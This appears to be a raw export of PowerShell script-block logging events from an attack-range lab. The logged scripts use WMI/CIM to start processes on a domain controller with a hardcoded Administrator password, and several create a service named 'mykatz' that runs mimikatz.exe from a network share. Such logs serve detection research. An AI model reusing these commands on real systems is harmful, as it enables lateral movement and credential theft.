4104152150x0743699Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Set-Alias -Name ncso -Value New-CimSessionOption -Option ReadOnly, AllScope -ErrorAction SilentlyContinue4f2be20e-215c-4069-b115-dcb6f5e143f2 4104152150x0743693Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Set-Alias -Name ncms -Value New-CimSession -Option ReadOnly, AllScope -ErrorAction SilentlyContinue0bd5bb9d-853e-4368-84bb-74015995c35e 4104152150x0743687Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Set-Alias -Name icim -Value Invoke-CimMethod -Option ReadOnly, AllScope -ErrorAction SilentlyContinue13205f20-1231-4aba-9781-3eadec3fdd49 4104152150x0743669Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11{# Set the remote computer name and credentials $RemoteComputer = "localhost" $PWord = ConvertTo-SecureString -String "P@ssword1" -AsPlainText -Force $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "Administrator", $Pword # Create a CIM session $CimSession = New-CimSession -ComputerName $RemoteComputer -Credential $Credential # Define the process you want to start $ProcessToStart = "calc.exe" # Invoke the Create method on the Win32_Process class to start the process $Result = Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $ProcessToStart} # Check the result if ($Result.ReturnValue -eq 0) { Write-Host "Process started successfully with Process ID: $($Result.ProcessId)" } else { Write-Host "Failed to start the process. Error code: $($Result.ReturnValue)" } # Clean up the CIM session Remove-CimSession -CimSession $CimSession}5ef41027-4973-4e23-afa2-855c1e967677 4104152150x0743667Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11& {# Set the remote computer name and credentials $RemoteComputer = "localhost" $PWord = ConvertTo-SecureString -String "P@ssword1" -AsPlainText -Force $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "Administrator", $Pword # Create a CIM session $CimSession = New-CimSession -ComputerName $RemoteComputer -Credential $Credential # Define the process you want to start $ProcessToStart = "calc.exe" # Invoke the Create method on the Win32_Process class to start the process $Result = Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $ProcessToStart} # Check the result if ($Result.ReturnValue -eq 0) { Write-Host "Process started successfully with Process ID: $($Result.ProcessId)" } else { Write-Host "Failed to start the process. Error code: $($Result.ReturnValue)" } # Clean up the CIM session Remove-CimSession -CimSession $CimSession}18410b56-5490-4029-be5e-f013d73a65f7 4104152150x0743497Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Set-Alias -Name ncso -Value New-CimSessionOption -Option ReadOnly, AllScope -ErrorAction SilentlyContinue15d38b1d-849c-43eb-a2a2-85f2676ba4b1 4104152150x0743491Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Set-Alias -Name ncms -Value New-CimSession -Option ReadOnly, AllScope -ErrorAction SilentlyContinueb1e25456-09b9-4e57-9063-ba36db31b1e0 4104152150x0743485Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Set-Alias -Name icim -Value Invoke-CimMethod -Option ReadOnly, AllScope -ErrorAction SilentlyContinue6a4b0aa7-c82a-463d-b82c-7f7bab168b82 4104152150x0743467Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11{# Set the remote computer name and credentials $RemoteComputer = "localhost" $PWord = ConvertTo-SecureString -String "P@ssword1" -AsPlainText -Force $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "Administrator", $Pword # Create a CIM session $CimSession = New-CimSession -ComputerName $RemoteComputer -Credential $Credential # Define the process you want to start $ProcessToStart = "calc.exe" # Invoke the Create method on the Win32_Process class to start the process $Result = Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $ProcessToStart} # Check the result if ($Result.ReturnValue -eq 0) { Write-Host "Process started successfully with Process ID: $($Result.ProcessId)" } else { Write-Host "Failed to start the process. Error code: $($Result.ReturnValue)" } # Clean up the CIM session Remove-CimSession -CimSession $CimSession}8a275f67-a36a-401b-b2b0-b280ea086d77 4104152150x0743465Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11& {# Set the remote computer name and credentials $RemoteComputer = "localhost" $PWord = ConvertTo-SecureString -String "P@ssword1" -AsPlainText -Force $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "Administrator", $Pword # Create a CIM session $CimSession = New-CimSession -ComputerName $RemoteComputer -Credential $Credential # Define the process you want to start $ProcessToStart = "calc.exe" # Invoke the Create method on the Win32_Process class to start the process $Result = Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $ProcessToStart} # Check the result if ($Result.ReturnValue -eq 0) { Write-Host "Process started successfully with Process ID: $($Result.ProcessId)" } else { Write-Host "Failed to start the process. Error code: $($Result.ReturnValue)" } # Clean up the CIM session Remove-CimSession -CimSession $CimSession}28c17cce-4080-4f0e-baa0-9d0d3e105b4d 4104152150x0743128Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Set-Alias -Name ncso -Value New-CimSessionOption -Option ReadOnly, AllScope -ErrorAction SilentlyContinuea7c01901-d258-4f7b-9df1-114206b8a18c 4104152150x0743122Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Set-Alias -Name ncms -Value New-CimSession -Option ReadOnly, AllScope -ErrorAction SilentlyContinue4de3b840-cd7a-4c85-b155-50404f8c571b 4104152150x0743116Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Set-Alias -Name icim -Value Invoke-CimMethod -Option ReadOnly, AllScope -ErrorAction SilentlyContinue81b15fb2-b2f5-4be1-9a7a-273ad54a4fb3 4104152150x0743098Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11{# Set the remote computer name and credentials $RemoteComputer = "localhost" $PWord = ConvertTo-SecureString -String "P@ssword1" -AsPlainText -Force $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "Administrator", $Pword # Create a CIM session $CimSession = New-CimSession -ComputerName $RemoteComputer -Credential $Credential # Define the process you want to start $ProcessToStart = "calc.exe" # Invoke the Create method on the Win32_Process class to start the process $Result = Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $ProcessToStart} # Check the result if ($Result.ReturnValue -eq 0) { Write-Host "Process started successfully with Process ID: $($Result.ProcessId)" } else { Write-Host "Failed to start the process. Error code: $($Result.ReturnValue)" } # Clean up the CIM session Remove-CimSession -CimSession $CimSession}288323c2-9629-47a5-afa1-0f66c33f4b18 4104152150x0743096Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11& {# Set the remote computer name and credentials $RemoteComputer = "localhost" $PWord = ConvertTo-SecureString -String "P@ssword1" -AsPlainText -Force $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "Administrator", $Pword # Create a CIM session $CimSession = New-CimSession -ComputerName $RemoteComputer -Credential $Credential # Define the process you want to start $ProcessToStart = "calc.exe" # Invoke the Create method on the Win32_Process class to start the process $Result = Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $ProcessToStart} # Check the result if ($Result.ReturnValue -eq 0) { Write-Host "Process started successfully with Process ID: $($Result.ProcessId)" } else { Write-Host "Failed to start the process. Error code: $($Result.ReturnValue)" } # Clean up the CIM session Remove-CimSession -CimSession $CimSession}f119f71b-cbd0-44f0-a261-111bdfc9df7a 4104152150x0740802Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11# Set the remote computer name and credentials $RemoteComputer = "mswin-dc01.attackrange.local" $PWord = ConvertTo-SecureString -String "P@ssword1" -AsPlainText -Force $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "Administrator", $Pword # Create a CIM session $CimSession = New-CimSession -ComputerName $RemoteComputer -Credential $Credential # Define the process you want to start $ProcessToStart = "calc.exe" # Invoke the Create method on the Win32_Process class to start the process $Result = Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $ProcessToStart} # Check the result if ($Result.ReturnValue -eq 0) { Write-Host "Process started successfully with Process ID: $($Result.ProcessId)" } else { Write-Host "Failed to start the process. Error code: $($Result.ReturnValue)" } # Clean up the CIM session Remove-CimSession -CimSession $CimSessiona2c58e4e-3455-484a-aa3a-6bb3a26253d2 4104152150x0740660Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11# Set the remote computer name and credentials $RemoteComputer = "mswin-dc01.attackrange.local" $PWord = ConvertTo-SecureString -String "P@ssword1" -AsPlainText -Force $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "Administrator", $Pword # Create a CIM session $CimSession = New-CimSession -ComputerName $RemoteComputer -Credential $Credential # Define the process you want to start $ProcessToStart = "calc.exe" # Invoke the Create method on the Win32_Process class to start the process $Result = Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $ProcessToStart} # Check the result if ($Result.ReturnValue -eq 0) { Write-Host "Process started successfully with Process ID: $($Result.ProcessId)" } else { Write-Host "Failed to start the process. Error code: $($Result.ReturnValue)" } # Clean up the CIM session Remove-CimSession -CimSession $CimSessionb799d98a-bf2e-4200-9152-1e26234deadd 4104152150x0740438Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Set-Alias -Name ncso -Value New-CimSessionOption -Option ReadOnly, AllScope -ErrorAction SilentlyContinue51ac8f61-06b2-4cc9-9218-edae28af6b52 4104152150x0740432Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Set-Alias -Name ncms -Value New-CimSession -Option ReadOnly, AllScope -ErrorAction SilentlyContinue5348ab7f-064a-4018-a13a-2d47b3f6173e 4104152150x0740426Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Set-Alias -Name icim -Value Invoke-CimMethod -Option ReadOnly, AllScope -ErrorAction SilentlyContinueef0a8a80-67aa-495e-aec6-fa8c5c0f828b 4104152150x0740408Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11{# Set the remote computer name and credentials $RemoteComputer = "mswin-dc01.attackrange.local" $PWord = ConvertTo-SecureString -String "P@ssword1" -AsPlainText -Force $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "Administrator", $Pword # Create a CIM session $CimSession = New-CimSession -ComputerName $RemoteComputer -Credential $Credential # Define the process you want to start $ProcessToStart = "calc.exe" # Invoke the Create method on the Win32_Process class to start the process $Result = Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $ProcessToStart} # Check the result if ($Result.ReturnValue -eq 0) { Write-Host "Process started successfully with Process ID: $($Result.ProcessId)" } else { Write-Host "Failed to start the process. Error code: $($Result.ReturnValue)" } # Clean up the CIM session Remove-CimSession -CimSession $CimSession}9b0c3fb8-653f-4a2a-b7bd-8eb11b43e918 4104152150x0740406Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11& {# Set the remote computer name and credentials $RemoteComputer = "mswin-dc01.attackrange.local" $PWord = ConvertTo-SecureString -String "P@ssword1" -AsPlainText -Force $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "Administrator", $Pword # Create a CIM session $CimSession = New-CimSession -ComputerName $RemoteComputer -Credential $Credential # Define the process you want to start $ProcessToStart = "calc.exe" # Invoke the Create method on the Win32_Process class to start the process $Result = Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $ProcessToStart} # Check the result if ($Result.ReturnValue -eq 0) { Write-Host "Process started successfully with Process ID: $($Result.ProcessId)" } else { Write-Host "Failed to start the process. Error code: $($Result.ReturnValue)" } # Clean up the CIM session Remove-CimSession -CimSession $CimSession}b86036ea-9afa-4de1-b993-d228f546ddf0 4104152150x0739993Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11# Set the remote computer name and credentials $RemoteComputer = "mswin-dc01.attackrange.local" $Credentials = Get-Credential # Create a CIM session $CimSession = New-CimSession -ComputerName $RemoteComputer -Credential $Credentials # Define the process you want to start $ProcessToStart = "calc.exe" # Invoke the Create method on the Win32_Process class to start the process $Result = Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $ProcessToStart} # Check the result if ($Result.ReturnValue -eq 0) { Write-Host "Process started successfully with Process ID: $($Result.ProcessId)" } else { Write-Host "Failed to start the process. Error code: $($Result.ReturnValue)" } # Clean up the CIM session Remove-CimSession -CimSession $CimSession12c1b119-7475-436b-a4ae-b82535d03664 4104152150x0739940Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11# Set the remote computer name and credentials $RemoteComputer = "mswin-dc01.attackrange.local" $Credentials = Get-Credential # Create a CIM session $CimSession = New-CimSession -ComputerName $RemoteComputer -Credential $Credentials # Define the process you want to start $ProcessToStart = "calc.exe" # Invoke the Create method on the Win32_Process class to start the process $Result = Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $ProcessToStart} # Check the result if ($Result.ReturnValue -eq 0) { Write-Host "Process started successfully with Process ID: $($Result.ProcessId)" } else { Write-Host "Failed to start the process. Error code: $($Result.ReturnValue)" } # Clean up the CIM session Remove-CimSession -CimSession $CimSession1407819a-1eed-4784-bde3-e83659c958cd 4104152150x0739771Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Set-Alias -Name ncso -Value New-CimSessionOption -Option ReadOnly, AllScope -ErrorAction SilentlyContinue449fe1ad-1403-45ec-aa1f-e133217e4a82 4104152150x0739765Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Set-Alias -Name ncms -Value New-CimSession -Option ReadOnly, AllScope -ErrorAction SilentlyContinueacc26cc8-b344-451b-857c-8f5a481f1a48 4104152150x0739759Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Set-Alias -Name icim -Value Invoke-CimMethod -Option ReadOnly, AllScope -ErrorAction SilentlyContinue17af4915-c552-4350-82a2-cf5a73dd4e8e 4104152150x0739636Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11$ComputerName = 'localhost' # adjust to your server names $Credential = Get-Credential # submit a user account with proper permissions # define the arguments you want to submit to the method # remove values that you do not want to submit # make sure you replace values with meaningful content before running the code # see section "Parameters" below for a description of each argument. $arguments = @{ DesktopInteract = [Boolean](12345) # replace 12345 with a meaningful value DisplayName = 'mykatz' # replace 'someText' with meaningful text ErrorControl = [UInt8](1) # replace 12345 with a meaningful value LoadOrderGroup = 'someText' # replace 'someText' with meaningful text LoadOrderGroupDependencies = 'someText' # replace 'someText' with meaningful text Name = 'mykatz' # replace 'someText' with meaningful text PathName = '\\10.0.1.17\c$\temp\mimikatz.exe' # replace 'someText' with meaningful text ServiceDependencies = 'mykatz' # replace 'someText' with meaningful text ServiceType = [UInt8](12345) # replace 12345 with a meaningful value StartMode = 'OWN_PROCESS' # replace 'someText' with meaningful text StartName = 'administrator' # replace 'someText' with meaningful text StartPassword = 'P@ssword1' # replace 'someText' with meaningful text } $session = New-CimSession -ComputerName $ComputerName -Credential $Credential Invoke-CimMethod -ClassName Win32_Service -Namespace Root/CIMV2 -MethodName Create -Arguments $arguments -CimSession $session | Add-Member -MemberType ScriptProperty -Name ReturnValueFriendly -Passthru -Value { switch ([int]$this.ReturnValue) { 0 {'Success'} 1 {'Not Supported'} 2 {'Access Denied'} 3 {'Dependent Services Running'} 4 {'Invalid Service Control'} 5 {'Service Cannot Accept Control'} 6 {'Service Not Active'} 7 {'Service Request Timeout'} 8 {'Unknown Failure'} 9 {'Path Not Found'} 10 {'Service Already Running'} 11 {'Service Database Locked'} 12 {'Service Dependency Deleted'} 13 {'Service Dependency Failure'} 14 {'Service Disabled'} 15 {'Service Logon Failed'} 16 {'Service Marked For Deletion'} 17 {'Service No Thread'} 18 {'Status Circular Dependency'} 19 {'Status Duplicate Name'} 20 {'Status Invalid Name'} 21 {'Status Invalid Parameter'} 22 {'Status Invalid Service Account'} 23 {'Status Service Exists'} 24 {'Service Already Paused'} default {'Unknown Error '} } } Remove-CimSession -CimSession $sessionc03fad18-b0ed-4829-9170-a52fcf15fe5f 4104152150x0739605Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11$ComputerName = 'localhost' # adjust to your server names $Credential = Get-Credential # submit a user account with proper permissions # define the arguments you want to submit to the method # remove values that you do not want to submit # make sure you replace values with meaningful content before running the code # see section "Parameters" below for a description of each argument. $arguments = @{ DesktopInteract = [Boolean](12345) # replace 12345 with a meaningful value DisplayName = 'mykatz' # replace 'someText' with meaningful text ErrorControl = [UInt8](mykatz) # replace 12345 with a meaningful value LoadOrderGroup = 'someText' # replace 'someText' with meaningful text LoadOrderGroupDependencies = 'someText' # replace 'someText' with meaningful text Name = 'mykatz' # replace 'someText' with meaningful text PathName = '\\10.0.1.17\c$\temp\mimikatz.exe' # replace 'someText' with meaningful text ServiceDependencies = 'mykatz' # replace 'someText' with meaningful text ServiceType = [UInt8](12345) # replace 12345 with a meaningful value StartMode = 'OWN_PROCESS' # replace 'someText' with meaningful text StartName = 'administrator' # replace 'someText' with meaningful text StartPassword = 'P@ssword1' # replace 'someText' with meaningful text } $session = New-CimSession -ComputerName $ComputerName -Credential $Credential Invoke-CimMethod -ClassName Win32_Service -Namespace Root/CIMV2 -MethodName Create -Arguments $arguments -CimSession $session | Add-Member -MemberType ScriptProperty -Name ReturnValueFriendly -Passthru -Value { switch ([int]$this.ReturnValue) { 0 {'Success'} 1 {'Not Supported'} 2 {'Access Denied'} 3 {'Dependent Services Running'} 4 {'Invalid Service Control'} 5 {'Service Cannot Accept Control'} 6 {'Service Not Active'} 7 {'Service Request Timeout'} 8 {'Unknown Failure'} 9 {'Path Not Found'} 10 {'Service Already Running'} 11 {'Service Database Locked'} 12 {'Service Dependency Deleted'} 13 {'Service Dependency Failure'} 14 {'Service Disabled'} 15 {'Service Logon Failed'} 16 {'Service Marked For Deletion'} 17 {'Service No Thread'} 18 {'Status Circular Dependency'} 19 {'Status Duplicate Name'} 20 {'Status Invalid Name'} 21 {'Status Invalid Parameter'} 22 {'Status Invalid Service Account'} 23 {'Status Service Exists'} 24 {'Service Already Paused'} default {'Unknown Error '} } } Remove-CimSession -CimSession $sessiond55a5a08-a5c0-4312-b9bf-f7f5ca4c1769 4104152150x0739572Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11$ComputerName = 'localhost' # adjust to your server names $Credential = Get-Credential # submit a user account with proper permissions # define the arguments you want to submit to the method # remove values that you do not want to submit # make sure you replace values with meaningful content before running the code # see section "Parameters" below for a description of each argument. $arguments = @{ DesktopInteract = [Boolean](12345) # replace 12345 with a meaningful value DisplayName = 'someText' # replace 'someText' with meaningful text ErrorControl = [UInt8](12345) # replace 12345 with a meaningful value LoadOrderGroup = 'someText' # replace 'someText' with meaningful text LoadOrderGroupDependencies = 'someText' # replace 'someText' with meaningful text Name = 'someText' # replace 'someText' with meaningful text PathName = 'someText' # replace 'someText' with meaningful text ServiceDependencies = 'someText' # replace 'someText' with meaningful text ServiceType = [UInt8](12345) # replace 12345 with a meaningful value StartMode = 'someText' # replace 'someText' with meaningful text StartName = 'someText' # replace 'someText' with meaningful text StartPassword = 'someText' # replace 'someText' with meaningful text } $session = New-CimSession -ComputerName $ComputerName -Credential $Credential Invoke-CimMethod -ClassName Win32_Service -Namespace Root/CIMV2 -MethodName Create -Arguments $arguments -CimSession $session | Add-Member -MemberType ScriptProperty -Name ReturnValueFriendly -Passthru -Value { switch ([int]$this.ReturnValue) { 0 {'Success'} 1 {'Not Supported'} 2 {'Access Denied'} 3 {'Dependent Services Running'} 4 {'Invalid Service Control'} 5 {'Service Cannot Accept Control'} 6 {'Service Not Active'} 7 {'Service Request Timeout'} 8 {'Unknown Failure'} 9 {'Path Not Found'} 10 {'Service Already Running'} 11 {'Service Database Locked'} 12 {'Service Dependency Deleted'} 13 {'Service Dependency Failure'} 14 {'Service Disabled'} 15 {'Service Logon Failed'} 16 {'Service Marked For Deletion'} 17 {'Service No Thread'} 18 {'Status Circular Dependency'} 19 {'Status Duplicate Name'} 20 {'Status Invalid Name'} 21 {'Status Invalid Parameter'} 22 {'Status Invalid Service Account'} 23 {'Status Service Exists'} 24 {'Service Already Paused'} default {'Unknown Error '} } } Remove-CimSession -CimSession $session2ffb4069-45dd-4c49-b55e-1ad76f2c041b 4104152150x0229024Microsoft-Windows-PowerShell/Operationalmswin-exch01.attackrange.local11Set-Alias -Name ncso -Value New-CimSessionOption -Option ReadOnly, AllScope -ErrorAction SilentlyContinue7fabfa72-6a11-4741-b8d2-6292cb0897a6 4104152150x0229018Microsoft-Windows-PowerShell/Operationalmswin-exch01.attackrange.local11Set-Alias -Name ncms -Value New-CimSession -Option ReadOnly, AllScope -ErrorAction SilentlyContinue8d53ff37-ceb0-4df4-bf04-cf9e0e37d979 4104152150x0229012Microsoft-Windows-PowerShell/Operationalmswin-exch01.attackrange.local11Set-Alias -Name icim -Value Invoke-CimMethod -Option ReadOnly, AllScope -ErrorAction SilentlyContinue4902909e-bb4b-4b21-9502-b179bacbce34 4104152150x0228755Microsoft-Windows-PowerShell/Operationalmswin-exch01.attackrange.local12# Copyright 2016 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Amazon Software License (the "License"). # You may not use this file except in compliance with the License. # A copy of the License is located at # # http://aws.amazon.com/asl/ # # or in the "license" file accompanying this file. This file is distributed # on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either # express or implied. See the License for the specific language governing # permissions and limitations under the License. <#----------------------------------------------------------------------------------------------------------- Add-DnsSuffixList adds DNS suffixes. -------------------------------------------------------------------------------------------------------------#> function Add-DnsSuffixList { $state = Get-LaunchConfig -Key AddDnsSuffixList [System.GC]::Collect() if (-not $state) { Write-Log "Adding DNS suffix list is disabled" return } $suffixList = @() Write-Log ("Adding DNS suffixes in search list begins") # Try to create a suffix with available zone try { # Availability-zone includes period at the end, so it needs to remove it. $availabilityZone = (Get-Metadata -UrlFragment "meta-data/placement/availability-zone").Trim() if ($availabilityZone.EndsWith(".")) { $availabilityZone = $availabilityZone.Substring(0,$availabilityZone.Length - 1) } $suffixList += "{0}.ec2-utilities.amazonaws.com" -f $availabilityZone.Substring(0,$availabilityZone.Length - 1) } catch { Write-ErrorLog ("Failed to get availability zone: {0}" -f $_.Exception.Message) } # Try to get global search list try { $tcpRegPath = "HKLM:\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" $tcpRegRes = Get-ItemProperty -Path $tcpRegPath $existingList = $tcpRegRes.SearchList -split "," foreach ($existing in $existingList) { if ($existing -and $suffixList -notcontains $existing) { $suffixList += $existing.ToLower() } } } catch { Write-ErrorLog ("Failed to get global search list: {0}" -f $_.Exception.Message) } # Try to get DNS Domain try { $dnsDomain = $tcpRegRes.Domain if ($dnsDomain -and $suffixList -notcontains $dnsDomain) { $suffixList += $dnsDomain.ToLower() } $isUsingDomainDevolution = $tcpRegRes.UseDomainNameDevolution if ($isUsingDomainDevolution -ne 0) { $dnsDomains = $dnsDomain -split "\." if ($dnsDomains.Length -gt 2) { $dns = $dnsDomains.Get($dnsDomains.Length - 1) for ($i = $dnsDomains.Length - 2; $i -ge 1; $i --) { $dns = "{0}.{1}" -f $dnsDomains.Get($i),$dns if ($dns -and $suffixList -notcontains $dns) { $suffixList += $dns.ToLower() } } } } } catch { Write-ErrorLog ("Failed to get DNS domain from registry: {0}" -f $_.Exception.Message) } # Try to get NV Domain - contains computer's primary DNS suffix try { $nvDomain = $tcpRegRes. "NV Domain" if ($nvDomain -and $suffixList -notcontains $nvDomain) { $suffixList += $nvDomain.ToLower() } } catch { Write-ErrorLog ("Failed to get NV domain: {0}" -f $_.Exception.Message) } # Try to get DNS Domain from connected NICs try { $networkAdapters = Get-CimInstance -ClassName Win32_NetworkAdapter foreach ($networkAdapter in $networkAdapters) { # Check each NIC if it is connected (Connected = 2) if ($networkAdapter.NetConnectionStatus -eq 2) { $networkConfig = Get-CimInstance -ClassName Win32_NetworkAdapterConfiguration -Filter "Index='$($networkAdapter.Index)'" $nicDnsDomain = $networkConfig.DNSDomain if ($nicDnsDomain -and $suffixList -notcontains $nicDnsDomain) { $suffixList += $nicDnsDomain.ToLower() } } } } catch { Write-ErrorLog ("Failed to get DNS domain from NICs: {0}" -f $_.Exception.Message) } try { # Set DNS suffix search list Invoke-CimMethod -ClassName Win32_NetworkAdapterConfiguration -MethodName "SetDNSSuffixSearchOrder" -Arguments @{ DNSDomainSuffixSearchOrder = $suffixList } | Out-Null } catch { Write-ErrorLog ("Failed to set DNS suffix search list: {0}" -f $_.Exception.Message) } Write-Log ("Adding DNS suffixes in search list done") } # SIG # Begin signature block # MIIuqgYJKoZIhvcNAQcCoIIumzCCLpcCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCAwdXMjmgee8GrG # wK7q1ggMNwj1l3PZixsOVf6I/u33B6CCFBkwggXAMIIEqKADAgECAhAP0bvKeWvX # +N1MguEKmpYxMA0GCSqGSIb3DQEBCwUAMGwxCzAJBgNVBAYTAlVTMRUwEwYDVQQK # EwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5jb20xKzApBgNV # BAMTIkRpZ2lDZXJ0IEhpZ2ggQXNzdXJhbmNlIEVWIFJvb3QgQ0EwHhcNMjIwMTEz # MDAwMDAwWhcNMzExMTA5MjM1OTU5WjBiMQswCQYDVQQGEwJVUzEVMBMGA1UEChMM # RGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cuZGlnaWNlcnQuY29tMSEwHwYDVQQD # ExhEaWdpQ2VydCBUcnVzdGVkIFJvb3QgRzQwggIiMA0GCSqGSIb3DQEBAQUAA4IC # DwAwggIKAoICAQC/5pBzaN675F1KPDAiMGkz7MKnJS7JIT3yithZwuEppz1Yq3aa # za57G4QNxDAf8xukOBbrVsaXbR2rsnnyyhHS5F/WBTxSD1Ifxp4VpX6+n6lXFllV # cq9ok3DCsrp1mWpzMpTREEQQLt+C8weE5nQ7bXHiLQwb7iDVySAdYyktzuxeTsiT # +CFhmzTrBcZe7FsavOvJz82sNEBfsXpm7nfISKhmV1efVFiODCu3T6cw2Vbuyntd # 463JT17lNecxy9qTXtyOj4DatpGYQJB5w3jHtrHEtWoYOAMQjdjUN6QuBX2I9YI+ # EJFwq1WCQTLX2wRzKm6RAXwhTNS8rhsDdV14Ztk6MUSaM0C/CNdaSaTC5qmgZ92k # J7yhTzm1EVgX9yRcRo9k98FpiHaYdj1ZXUJ2h4mXaXpI8OCiEhtmmnTK3kse5w5j # rubU75KSOp493ADkRSWJtppEGSt+wJS00mFt6zPZxd9LBADMfRyVw4/3IbKyEbe7 # f/LVjHAsQWCqsWMYRJUadmJ+9oCw++hkpjPRiQfhvbfmQ6QYuKZ3AeEPlAwhHbJU # KSWJbOUOUlFHdL4mrLZBdd56rF+NP8m800ERElvlEFDrMcXKchYiCd98THU/Y+wh # X8QgUWtvsauGi0/C1kVfnSD8oR7FwI+isX4KJpn15GkvmB0t9dmpsh3lGwIDAQAB # o4IBZjCCAWIwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQU7NfjgtJxXWRM3y5n # P+e6mK4cD08wHwYDVR0jBBgwFoAUsT7DaQP4v0cB1JgmGggC72NkK8MwDgYDVR0P # AQH/BAQDAgGGMBMGA1UdJQQMMAoGCCsGAQUFBwMDMH8GCCsGAQUFBwEBBHMwcTAk # BggrBgEFBQcwAYYYaHR0cDovL29jc3AuZGlnaWNlcnQuY29tMEkGCCsGAQUFBzAC # hj1odHRwOi8vY2FjZXJ0cy5kaWdpY2VydC5jb20vRGlnaUNlcnRIaWdoQXNzdXJh # bmNlRVZSb290Q0EuY3J0MEsGA1UdHwREMEIwQKA+oDyGOmh0dHA6Ly9jcmwzLmRp # Z2ljZXJ0LmNvbS9EaWdpQ2VydEhpZ2hBc3N1cmFuY2VFVlJvb3RDQS5jcmwwHAYD # VR0gBBUwEzAHBgVngQwBAzAIBgZngQwBBAEwDQYJKoZIhvcNAQELBQADggEBAEHx # qRH0DxNHecllao3A7pgEpMbjDPKisedfYk/ak1k2zfIe4R7sD+EbP5HU5A/C5pg0 # /xkPZigfT2IxpCrhKhO61z7H0ZL+q93fqpgzRh9Onr3g7QdG64AupP2uU7SkwaT1 # IY1rzAGt9Rnu15ClMlIr28xzDxj4+87eg3Gn77tRWwR2L62t0+od/P1Tk+WMieNg # GbngLyOOLFxJy34riDkruQZhiPOuAnZ2dMFkkbiJUZflhX0901emWG4f7vtpYeJa # 3Cgh6GO6Ps9W7Zrk9wXqyvPsEt84zdp7PiuTUy9cUQBY3pBIowrHC/Q7bVUx8ALM # R3eWUaNetbxcyEMRoacwggawMIIEmKADAgECAhAIrUCyYNKcTJ9ezam9k67ZMA0G # CSqGSIb3DQEBDAUAMGIxCzAJBgNVBAYTAlVTMRUwEwYDVQQKEwxEaWdpQ2VydCBJ # bmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5jb20xITAfBgNVBAMTGERpZ2lDZXJ0 # IFRydXN0ZWQgUm9vdCBHNDAeFw0yMTA0MjkwMDAwMDBaFw0zNjA0MjgyMzU5NTla # MGkxCzAJBgNVBAYTAlVTMRcwFQYDVQQKEw5EaWdpQ2VydCwgSW5jLjFBMD8GA1UE # 